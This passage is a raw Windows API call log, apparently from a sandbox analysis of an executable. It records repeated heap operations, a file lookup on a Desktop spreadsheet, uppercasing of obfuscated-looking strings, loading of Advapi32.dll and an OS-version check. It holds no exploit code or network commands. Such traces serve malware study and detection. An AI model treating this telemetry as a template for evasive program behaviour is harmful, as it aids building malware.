lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0160.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0160.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0160.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0160.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0160.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0160.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.672] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0160.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.672] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0160.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/5EdvDyyb.xls", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c31f8d0, ftCreationTime.dwHighDateTime=0x1d4d345, ftLastAccessTime.dwLowDateTime=0xe41c40a0, ftLastAccessTime.dwHighDateTime=0x1d4d2d9, ftLastWriteTime.dwLowDateTime=0xe41c40a0, ftLastWriteTime.dwHighDateTime=0x1d4d2d9, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0xfcb0006, dwReserved1=0xce78, cFileName="5EdvDyyb.xls", cAlternateFileName="")) returned 0xaa56a0 [0160.673] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0160.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.674] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0160.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0160.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.675] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.675] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.675] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.675] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.676] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.676] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.676] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.676] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.676] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.677] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.677] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.677] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.678] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.678] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.678] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.678] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.678] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.678] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0160.679] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.679] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.679] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.679] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.679] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.679] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.679] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0160.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0160.679] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.679] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.679] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0160.679] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.679] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0160.679] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0160.679] 